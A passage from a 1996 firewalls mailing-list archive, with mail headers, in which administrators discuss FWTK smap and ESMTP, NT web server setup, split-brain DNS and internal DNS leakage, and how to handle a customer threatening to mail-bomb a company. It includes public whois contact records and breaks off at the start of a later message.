(relay-4.mail.demon.net [158.152.1.108]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA13693 for ; Mon, 8 Jul 1996 13:37:38 -0700 (PDT) Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net Received: from tracker.demon.co.uk ([158.152.150.126]) by relay-3.mail.demon.net From: Les Carleton To: firewalls@greatcircle.com Newsgroups: comp.security.firewalls Subject: ROTHERWICK: Whats New? Date: Mon, 08 Jul 1996 20:19:47 GMT Organization: The Rotherwick Firewall Resource Reply-To: les@zeuros.co.uk Message-ID: <31e16767.2104212@news.demon.co.uk> X-Mailer: Forte Agent .99e/32.227 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi folks, First off i'd like to thank publically everyone who's contributed to the Rotherwick Firewall Resource with URLs, papers etc etc etc. You've all been great! Its been a while since we launched the resource to provide a single start point for firewalling information, since then its grown about five-fold to over 700 pointers, papers and links. I will be removing the "beta phase" notes over the next few days. If you haven't been by the resource recently, then it's well worth a visit, we now have a large slice of firewall articles referenced and a Product Matrix which maps all the firewalls we have listed against their platforms (or as close as we could get from the information available!) and a What's New? page which you can bookmark to keep up to date. What we'd like to add to the resource is some form of column(s) about current issues, not in depth technical stuff, just some chat about issues and event in the firewalling community, but we need a couple of folks who are willing to contribute a small article, say, once a month (ish). Is anyone interested? There is no pay and no reward except getting your name in print on the web. I'd love to pay, but since we're not exactly funded, it'd be a bit difficult :-). If you're interested, let me know at les@zeuros.co.uk. Anyways ... this is costing bandwidth, so thanks again to all the contributors! Pop by ... you're all welcome! Cheers! ...Les... Les Carleton at The Rotherwick Firewall Resource http://www.zeuros.co.uk/firewall les@zeuros.co.uk From firewalls-owner Tue Jul 9 06:04:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA15391 for firewalls-outgoing; Tue, 9 Jul 1996 05:49:57 -0700 (PDT) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA15384 for ; Tue, 9 Jul 1996 05:49:50 -0700 (PDT) From: snoopy@munich.ixos.de Received: from mailhost.ixos.de by relay6.UU.NET with SMTP Received: from polo.ixos.de ixos.de Message-Id: <9607091158.AA17463@polo.ixos.de> Received: from localhost ixos X-Mailer: exmh version 1.6.4 10/10/95 To: firewalls@greatcircle.com Subject: Does smap from the TIS Toolkit speak ESMTP ? Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Tue, 09 Jul 1996 13:58:04 +0200 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi there, we are running a slightly older version of the FWTK and the smap deaemon does not seem to do ESMTP. Is there a version available which speaks ESMTP ? Thanks a lot... Love, Snoopy -- snoopy@munich.ixos.de Every passing hour brings the solar system 43,000 miles closer to globular cluster M13 in Hercules and yet there are still some misfits who insist there is no such thing as progress. - Kurt Vonnegut Jr. From firewalls-owner Tue Jul 9 07:06:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA18044 for firewalls-outgoing; Tue, 9 Jul 1996 06:48:21 -0700 (PDT) Received: from valiant.te.CdnAir.CA (valiant.te.CdnAir.CA [142.147.15.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA18037 for ; Tue, 9 Jul 1996 06:48:16 -0700 (PDT) Received: by valiant.te.CdnAir.CA id AA24449 Date: Tue, 9 Jul 1996 06:35:39 -0700 (PDT) From: "Grant M. Fengstad" <419450@valiant.te.CdnAir.CA> To: snoopy@munic.ixos.de Cc: firewalls@greatcircle.com Subject: Re: Does smap from the TIS Toolkit speak ESMTP ? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jul 1996 snoopy@munich.ixos.de wrote: > > Hi there, > > we are running a slightly older version of the FWTK and the smap deaemon does > not seem to do ESMTP. > > Is there a version available which speaks ESMTP ? > Correct me if I'm wrong, but is not the purpose of SMAP to provide a "bulletproof" front-end to sendmail. If this is the focus, SMAP should be as simple and clean as possible. It would be a mistake to implement lots of functionality and logic in the program. From firewalls-owner Tue Jul 9 09:22:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA24033 for firewalls-outgoing; Tue, 9 Jul 1996 09:17:10 -0700 (PDT) Received: from vpm.com (vpm.com [207.49.29.143]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA24026 for ; Tue, 9 Jul 1996 09:17:05 -0700 (PDT) Received: from snoopy (pm28.cwo.com [207.49.29.38]) by vpm.com (8.6.12/8.6.12) with SMTP id JAA07118; Tue, 9 Jul 1996 09:16:34 -0700 Message-Id: <199607091616.JAA07118@vpm.com> X-Sender: mcs@vpm.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 09 Jul 1996 09:11:16 -0700 To: firewalls@GreatCircle.COM From: Mark Stout Subject: Setting up an NT firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All: I'm looking for information on how best to install a NT server that will serve the Internet as a web server, but allow internal remote access to the NT server. Can anyone provide me with information or some places to look? Thanks, Mark ========================================================================== Mark Stout | The Village Potpourri Mall: http://www.vpm.com/ ---------------+---------------------------------------------------------- VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427 Secured Internet Sales, Marketing and Advertising Specialist ========================================================================== From firewalls-owner Tue Jul 9 09:34:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA23874 for firewalls-outgoing; Tue, 9 Jul 1996 09:08:49 -0700 (PDT) Received: from apu.connectix.com (apu.connectix.com [204.247.159.242]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA23867 for ; Tue, 9 Jul 1996 09:08:44 -0700 (PDT) Received: from [204.118.199.198] (snowball.connectix.com [204.118.199.198]) by apu.connectix.com (8.7.5/8.6.9) with SMTP id JAA16851 for ; Tue, 9 Jul 1996 09:06:09 -0700 Date: Tue, 9 Jul 1996 09:06:09 -0700 Message-Id: <199607091606.JAA16851@apu.connectix.com> Subject: Threats and Nasty Emails From: Rob Sansom To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Although this is not really related to firewalls, I was wondering If anyone had a suggestion for a response to a belligerent individual who has been threatening to 'mail bomb' our site, as well as slander our company in the UK. Apparently , this person is very disatisfied with the performance of the product that they purchased, and the resulting response from tech support. I guess that they got so frustrated that they sent a letter to 'root' at our site, and that's how I got involved. I am wondering if a response to the 'postmaster, or root at their site would be a good idea, or should I just let it be. It's easy to block access from their net, but I would rather not do this. The net in question is 'intonet.co.uk' and I have tried 'whois' on the domain to no avail (to try to contact the net admin, God forbid this person should be the net admin!), and if anyone has any information on a contact at intonet.co.uk, I would greatly appreciarte any information. Thanks in Advance, Rob Sansom Network Admin. Connectix Corp (415) 638-7398 sansom@connectix.com From firewalls-owner Tue Jul 9 09:49:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25273 for firewalls-outgoing; Tue, 9 Jul 1996 09:43:42 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA25202 for ; Tue, 9 Jul 1996 09:43:17 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id SAA28109; Tue, 9 Jul 1996 18:36:47 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31E28A92.7552@apogee-com.fr> Date: Tue, 09 Jul 1996 18:36:34 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com, sean.scotvold@rnb.com Subject: split-brain DNS Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys (and hello girls :D ) After being away for a long time, I'd like to thank all of you who answered to my questions about split-brain DNS and the 'internal subdomains problem'. I've installed the noforward patch and tested it. This works really great. Many thanks to Blast who pointed me to the right direction: ftp://ftp.vix.com/bind/release/4.9.3/contrib/noforward.tar.gz Cheers, Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Tue Jul 9 10:04:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA25938 for firewalls-outgoing; Tue, 9 Jul 1996 09:51:54 -0700 (PDT) Received: from igubu.saix.co.za (igubu.saix.net [196.25.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA25919 for ; Tue, 9 Jul 1996 09:51:40 -0700 (PDT) Received: from afjhb1exch1.aforbes.co.za Received: by afjhb1exch1.aforbes.co.za with Microsoft Exchange (IMC 4.0.837.3) Message-ID: From: Shepherd Rudie To: "'firewalls@greatcircle.com'" Subject: DNS leakage Date: Tue, 9 Jul 1996 18:51:42 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also runs the DNS server for the "outside". On the "inside" there's an NT machine running BIND for internal DNS. The FW is set up to to use the inside NS for lookups and the inside NS forwards all queries to the FW DNS server. Problem is this: The last time my zone was transferred to my ISP, the INTERNAL names suddenly appeared on the internet! Of course this wrecked e-mail and other things as well, but how is this possible? How can the outside DNS provide the secondary with any information regarding the inside? BTW the inside network is not even accessible from the Internet (and thus the secondary DNS). Any ideas? Rudie From firewalls-owner Tue Jul 9 10:22:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26322 for firewalls-outgoing; Tue, 9 Jul 1996 09:55:50 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA26287 for ; Tue, 9 Jul 1996 09:55:40 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id JAA05964; Tue, 9 Jul 1996 09:52:58 -0700 Date: Tue, 9 Jul 1996 09:52:57 -0700 (PDT) From: Robert Hanson To: Mark Stout cc: firewalls@GreatCircle.COM Subject: Re: Setting up an NT firewall In-Reply-To: <199607091616.JAA07118@vpm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk www.microsoft.com www.ntworld.com www.emerald.iea.com ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Tue, 9 Jul 1996, Mark Stout wrote: > Hi All: > > > I'm looking for information on how best to install a NT server that will > serve the Internet as a web server, but allow internal remote access to the > NT server. Can anyone provide me with information or some places to look? > > Thanks, > Mark > ========================================================================== > Mark Stout | The Village Potpourri Mall: http://www.vpm.com/ > ---------------+---------------------------------------------------------- > VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427 > Secured Internet Sales, Marketing and Advertising Specialist > ========================================================================== > From firewalls-owner Tue Jul 9 10:34:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26375 for firewalls-outgoing; Tue, 9 Jul 1996 09:56:23 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA26335 for ; Tue, 9 Jul 1996 09:56:08 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id JAA05975; Tue, 9 Jul 1996 09:53:24 -0700 Date: Tue, 9 Jul 1996 09:53:23 -0700 (PDT) From: Robert Hanson To: Mark Stout cc: firewalls@GreatCircle.COM Subject: Re: Setting up an NT firewall In-Reply-To: <199607091616.JAA07118@vpm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk oh... and try emailing daler@iea.com he is "truly" an nt expert... ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Tue, 9 Jul 1996, Mark Stout wrote: > Hi All: > > > I'm looking for information on how best to install a NT server that will > serve the Internet as a web server, but allow internal remote access to the > NT server. Can anyone provide me with information or some places to look? > > Thanks, > Mark > ========================================================================== > Mark Stout | The Village Potpourri Mall: http://www.vpm.com/ > ---------------+---------------------------------------------------------- > VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427 > Secured Internet Sales, Marketing and Advertising Specialist > ========================================================================== > From firewalls-owner Tue Jul 9 10:49:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA00158 for firewalls-outgoing; Tue, 9 Jul 1996 10:27:11 -0700 (PDT) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA00131 for ; Tue, 9 Jul 1996 10:27:01 -0700 (PDT) Received: from pm1-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) Date: Tue, 9 Jul 96 12:22:45 -0400 Message-Id: <9607091622.AA12030@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Rob Sansom From: Frank Willoughby Subject: Re: Threats and Nasty Emails Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote: >Although this is not really related to firewalls, I was wondering If >anyone had a suggestion for a response to a belligerent individual who >has been threatening to 'mail bomb' our site, as well as slander our >company in the UK. Apparently , this person is very disatisfied with the >performance of the product that they purchased, and the resulting >response from tech support. I guess that they got so frustrated that >they sent a letter to 'root' at our site, and that's how I got involved. >I am wondering if a response to the 'postmaster, or root at their site >would be a good idea, or should I just let it be. It's easy to block >access from their net, but I would rather not do this. The net in >question is 'intonet.co.uk' and I have tried 'whois' on the domain to no >avail (to try to contact the net admin, God forbid this person should be >the net admin!), and if anyone has any information on a contact at >intonet.co.uk, I would greatly appreciarte any information. There are two issues here - business & security. In either case, I would not "let it be". Business ======== How companies react to beligerent customers is a good barometer of their commitment to their customers (without which the company would soon fold). If the customer has a legitimate problem, then escalate it through channels to ensure that it is resolved to the customer's satisfaction. It is *very* important that you make the customer aware that the escalation of the problem is a result of normal business operations (ie - customer support) and NOT the result of any threats. If the customer does not have a legitimate complaint, explain to the individual why the complaint is not valid. Try to see the issues from the customer's viewpoint and see if something could be misconstrued to cause the grief he is experiencing. In any case, it is prudent to help a customer with a problem. Not because they make threats or whine, but because it is a good business practice. Security ======== Regarding where you stand, here's my 2 cents worth: Allegedly, the customer made threats to your organization. Proving this in a court of law will be difficult at best. All their lawyer has to do is mumble something about "mail spoofing" and make a feeble attempt to explain what it is and the burden of proof will be on you to prove (to a judge or a lay jury) that the customer did in fact send the mail. Without the cooperation of the local authorities & telecommunications provider, this will not be trivial. If the customer persists after you have notified the local authorities & solicited the assistance of the telecom provider, then you will have more evidence (but you are still left with trying to explain this to a judge/jury). IMHO, if it got to court, a lot of things just went out of controlled. This should be defused long before it reaches the courts. If it was me, I would contact the customer and ask the customer to explain what their problem is and promise to escalate their problem through channels to see that it is resolved one way or another. BTW, please ensure that you carry out your promise - otherwise this will further reflect (negatively) on your organization and the customer may (wrongly so) feel justified in carrying out threats. After the customer has vented some steam by explaining to you what the problem is, politely point out that while you will escalate their problem through channels, you are not doing so as a result of their threats. I would also explain that while he made the threats in anger and proably didn't really wish to carry them out, that your company takes threats seriously and that if the threats persist, that you will contact the person's manager as well as the local authorities and turn over the evidence to them and prosecute to the fullest extent of the law. BTW, make sure that you have the support to back up your stated actions (ascertained by a brief discussion of the incident with management) and you have maintained "chain-of-custody" of the evidence to ensure that it has not been tampered with in any way. Also explain that if he desists in the threats and/or attempts to carry them out that you will drop the incident. You probably already know this, but ensure that you have all of your ducks in a row before the problem gets escalated to management or the authorities. BTW, mentioning the customer's name on the Internet didn't really do very much to defuse the situation. Again, in a lawsuit, the burden of proof will be on you to prove that the person did indeed send the threats to you. Also, we don't have a "need-to-know" who the customer is. Who it is - is irrelevant. What they did isn't. To summarize, speak softly & carry a big stick. Try to help the person as much as you can, but if they persist in the threats, escalate the situation to someone who can better deal with it (managers, authorities, attorneys, etc). >Thanks in Advance, > >Rob Sansom >Network Admin. >Connectix Corp >(415) 638-7398 >sansom@connectix.com I hope the above was of some help to you. Best Regards, Frank Any sufficiently advanced bug is indistinguishable from a feature. -- Rich Kulawiec The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Information Security Consulting http://www.fortified.com Phone: (317) 573-0800 FAX: (317) 573-0817 Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Tue Jul 9 11:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA06462 for firewalls-outgoing; Tue, 9 Jul 1996 11:28:41 -0700 (PDT) Received: from etamin.brunel.ac.uk (etamin.brunel.ac.uk [134.83.128.61]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA06444 for ; Tue, 9 Jul 1996 11:28:32 -0700 (PDT) Received: from bips50.brunel.ac.uk by etamin.brunel.ac.uk with SMTP (PP); From: R Ghosh-Roy Message-Id: <2645.9607091825@bips50.brunel.ac.uk> Subject: Re: Threats and Nasty Emails To: frankw@in.net (Frank Willoughby) Date: Tue, 9 Jul 1996 19:25:45 +0100 (BST) Cc: sansom@connectix.com, firewalls@GreatCircle.com In-Reply-To: <9607091622.AA12030@su1.in.net> from "Frank Willoughby" at Jul 9, 96 12:22:45 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote: > > >Although this is not really related to firewalls, I was wondering If > >anyone had a suggestion for a response to a belligerent individual who > >has been threatening to 'mail bomb' our site, as well as slander our > >company in the UK. Apparently , this person is very disatisfied with the > >performance of the product that they purchased, and the resulting > >response from tech support. I guess that they got so frustrated that > >they sent a letter to 'root' at our site, and that's how I got involved. > >I am wondering if a response to the 'postmaster, or root at their site > >would be a good idea, or should I just let it be. It's easy to block > >access from their net, but I would rather not do this. The net in > >question is 'intonet.co.uk' and I have tried 'whois' on the domain to no > >avail (to try to contact the net admin, God forbid this person should be > >the net admin!), and if anyone has any information on a contact at > >intonet.co.uk, I would greatly appreciarte any information. > > There are two issues here - business & security. In either case, I > would not "let it be". > > Business > ======== > Security > ======== > > To summarize, speak softly & carry a big stick. Try to help the > person as much as you can, but if they persist in the threats, > escalate the situation to someone who can better deal with it > (managers, authorities, attorneys, etc). > As far as I can understand, the problem is not at a *personal* level. Therefore, the guy is arguing on behalf of his company which truly feels cheated. If your product didn't meet their requirements, it could be due to a variety of reasons. As Frank suggests, reason it out! Have a nice day! Rana ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + R. Ghosh-Roy, Research Fellow @ BIPS + + -- R.Ghosh-Roy@brunel.ac.uk -- Extension 2772 + + --.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.--.-- + + All opinions stated are my own, and don't even vaguely resemble those of + + Brunel University or Brunel Colleges. ;-) + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From firewalls-owner Tue Jul 9 11:49:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA07256 for firewalls-outgoing; Tue, 9 Jul 1996 11:37:37 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA07249 for ; Tue, 9 Jul 1996 11:37:30 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) Date: Tue, 9 Jul 1996 14:34:06 -0400 (EDT) Message-Id: <199607091834.OAA23298@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, sansom@connectix.com Subject: Re: Threats and Nasty Emails Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rob Sansom Network Admin. Connectix Corp wrote: >Although this is not really related to firewalls, I was wondering If >anyone had a suggestion for a response to a belligerent individual who >has been threatening to 'mail bomb' our site, as well as slander our >company in the UK. Apparently , this person is very disatisfied with the >performance of the product that they purchased, and the resulting >response from tech support. I guess that they got so frustrated that >they sent a letter to 'root' at our site, and that's how I got involved. >I am wondering if a response to the 'postmaster, or root at their site >would be a good idea, or should I just let it be. It's easy to block >access from their net, but I would rather not do this. The net in >question is 'intonet.co.uk' and I have tried 'whois' on the domain to no >avail (to try to contact the net admin, God forbid this person should be >the net admin!), and if anyone has any information on a contact at >intonet.co.uk, I would greatly appreciarte any information. 1) Socially, the firs response is always to ask the individual calmly and privately to stop. Sounds like that has already been down in this case. 2) Next step is usually to contact the contact person(s) at their site. I did a telnet to info.ripe.net and found some information about Intonet ltd., their net and ISP. British Telecom is apparently their ISP (bt.net): Interactive RIPE Whois Database server inetnum: 194.73.231.0 netname: BT-CUST-3 descr: intonet ltd. country: GB admin-c: j bunyer tech-c: simon barnett status: ASSIGNED PA changed: Stewart.Mercer@bt.net 960319 source: RIPE route: 194.72.0.0/15 descr: BTnet origin: AS2856 mnt-by: BTNET-MNT changed: peter.willis@bt.net 951018 source: RIPE Here are two contacts at the company (both have the same email address on intonet.co.uk ) and their -- exactly the same -- phone number(s): person: j bunyer address: millbourne house address: 66-70 coombe road address: new malden address: surrey address: uk address: kt3 4qw phone: +44 1819429214 fax-no: +44 1819498033 e-mail: bunny@intonet.co.uk changed: Stewart.Mercer@bt.net 960319 source: RIPE person: simon barnett address: millbourne house address: 66-70 coombe road address: new malden address: surrey address: uk address: kt3 4qw phone: +44 1819429214 fax-no: +44 1819498033 e-mail: bunny@intonet.co.uk changed: Stewart.Mercer@bt.net 960319 source: RIPE 3) If contacting people at Intonet.co.uk doesn't work you might want to contact their ISP. Using the same whois search interface at info.ripe.net I found that the primary administrative contact at BT.NET was Nigel Titley ( Nigel.Titley@bt.net ) and the primary technical contact was Peter Willis ( peter.willis@bt.net ). Here is the information in RIPE whois format for Nigel Titley: person: Nigel Titley address: PP201 address: Network House address: Brindley Way address: Apsley address: Hemel Hempstead address: Herts address: HP3 9RR phone: +44 1442 237674 fax-no: +44 1442 237728 e-mail: Nigel.Titley@bt.net nic-hdl: NT13 notify: Nigel.Titley@bt.net changed: Nigel.Titley@bt.net 950306 changed: Nigel.Titley@bt.net 941223 changed: N.Titley@axion.bt.co.uk 920128 changed: Nigel.Titley@axion.bt.co.uk 940711 changed: dfk@cwi.nl 920129 source: RIPE Here is the information in RIPE whois format for Peter Willis : person: Peter Willis address: PP201 address: Network House address: Brindley Way address: Apsley address: Hemel Hempstead address: Herts address: HP3 9RR address: GB phone: +44 1442 237673 fax-no: +44 1442 237728 e-mail: peter.willis@bt.net nic-hdl: PW19-RIPE changed: nigel.titley@bt.net 950306 changed: peter.willis@bt.net 941118 changed: hostmaster@ripe.net 950815 source: RIPE 4) The next step after talking to an ISP and getting no satisfaction would be to contact your legal staff. Successfully defending yourself against slander from someone on another continent would appear to be a daunting (and expensive) proposition. Perhaps someone with a better knownledge of English law.... 5) As to technical solutions -- if you just want to block someone's email address (they can always change the email address their email comes from though): We've had real problems with obnoxious individuals abusing our e-mail->netnews gateway (subscribing the alias feeds for newsgroups to tens of Internet mailing lists etc. as part of some ongoing flame war in alt.gothic and alt.college.college-bowl, etc.). We created a spam filter which lets us block e-mail from being fed into our local mail2news gateway. It could possibly be adapted to serve a a sendmail->sendmail filter as well (or you can use it to frontend e-mail to aliases for your incoming email). The README file is available via URLs: ftp://ftp.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.README http://www.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.README The Gzipped tar file is available via URLs: ftp://ftp.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.tar.gz http://www.cs.yale.edu/pub/long/src/network/security/spammerjammer-1.2.tar.gz ----- H. Morrow Long, Mgr of Dev., Yale Univ., Comp Sci Dept, 011 AKW, New Haven, CT 06520-8285, VOICE: (203)-432-{1248,1254} FAX: (203)-432-0593 From firewalls-owner Tue Jul 9 12:42:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA11587 for firewalls-outgoing; Tue, 9 Jul 1996 12:21:22 -0700 (PDT) Received: from us.checkpoint.com (us.checkpoint.com [206.86.35.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA11568 for ; Tue, 9 Jul 1996 12:21:14 -0700 (PDT) Received: from Barbara Jaarsma.us.checkpoint.com ([206.86.35.30]) by us.checkpoint.com (5.x/SMI-SVR4) Message-Id: <31E2B16D.247A@us.checkpoint.com> Date: Tue, 09 Jul 1996 12:22:21 -0700 From: Barbara Jaarsma Organization: CheckPoint Software Technologies, Inc. Technical Services X-Mailer: Mozilla 2.0 (Win95; U) Mime-Version: 1.0 To: sansom@connectix.com Cc: firewalls@greatcircle.com Subject: email bombing Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rob - This happened to me some months ago at a different company. I immediately escalated it through my management to our CEO, who contacted the CEO of the person who made the threat (and, as it turned out, actually carried it out and brought down our corporate net). He was fired on the spot, and another individual was assigned to work with us to resolve the issues. As it turned out, there *were* no issues - simply a bully who didn't have a clue what he was doing and didn't understand either the manuals or our verbal walk-throughs... These people are bottom feeders and do not belong in positions of authority. There are plenty of windows and toilets to clean, and that is all they're fit for. Note that the preceeding opinion is my own, and the actions were taken by a different employer, and in no way represents the opinions and/or potential actions of my current employer. (But the only way to get rid of a cockroach is to squish it...) -Barb From firewalls-owner Tue Jul 9 12:49:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12466 for firewalls-outgoing; Tue, 9 Jul 1996 12:35:33 -0700 (PDT) Received: from lokkur.dexter.mi.us (lokkur.dexter.mi.us [148.59.2.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA12443 for ; Tue, 9 Jul 1996 12:35:22 -0700 (PDT) Received: (from scs@localhost) by lokkur.dexter.mi.us (8.7.5/8.7.5/lokkur-1.1-scs) id PAA08735; Tue, 9 Jul 1996 15:32:31 -0400 (EDT) To: firewalls@GreatCircle.COM Path: lokkur.dexter.mi.us!not-for-mail From: scs@lokkur.dexter.mi.us (Steve Simmons) Newsgroups: local.firewalls Subject: Re: Threats and Nasty Emails Date: 9 Jul 1996 15:32:31 -0400 Organization: Inland Sea Lines: 22 Distribution: local Message-ID: <4ruc4f$8gs@lokkur.dexter.mi.us> References: <9607091622.AA12030@su1.in.net> X-Newsreader: NN version 6.5.0 CURRENT #2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Willoughby writes: >At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote: >>Although this is not really related to firewalls, I was wondering If >>anyone had a suggestion for a response to a belligerent individual who >>has been threatening to 'mail bomb' our site, as well as slander our >>company in the UK. . . . Frank writes some good advice, and then says: >If the customer does not have a legitimate complaint, explain to the >individual why the complaint is not valid. . . . Absolutely not. You're a sysadmin, not customer support or a service bureau for outside things. Take the issues to your management, and let them deal with it. You shouldn't in any way contact the customer. -- ``You gotta distinguish between telling a tale for amusement, as in "Well, there I was facing down the crowds at Riotcon...", and telling it for the record, as in "Well, you see, officer, it happened like this...". (Actually, that might not be the best example.)'' -- Chris Clayton, in private email From firewalls-owner Tue Jul 9 15:04:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA21147 for firewalls-outgoing; Tue, 9 Jul 1996 14:48:24 -0700 (PDT) Received: from zoltar.cse.ucsc.edu (zoltar.cse.ucsc.edu [128.114.134.133]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA21138 for ; Tue, 9 Jul 1996 14:48:18 -0700 (PDT) Received: (from clay@localhost) by zoltar.cse.ucsc.edu (8.6.10/8.6.9) id OAA24288; Tue, 9 Jul 1996 14:45:48 -0700 Date: Tue, 9 Jul 1996 14:45:47 -0700 (PDT) From: Clay 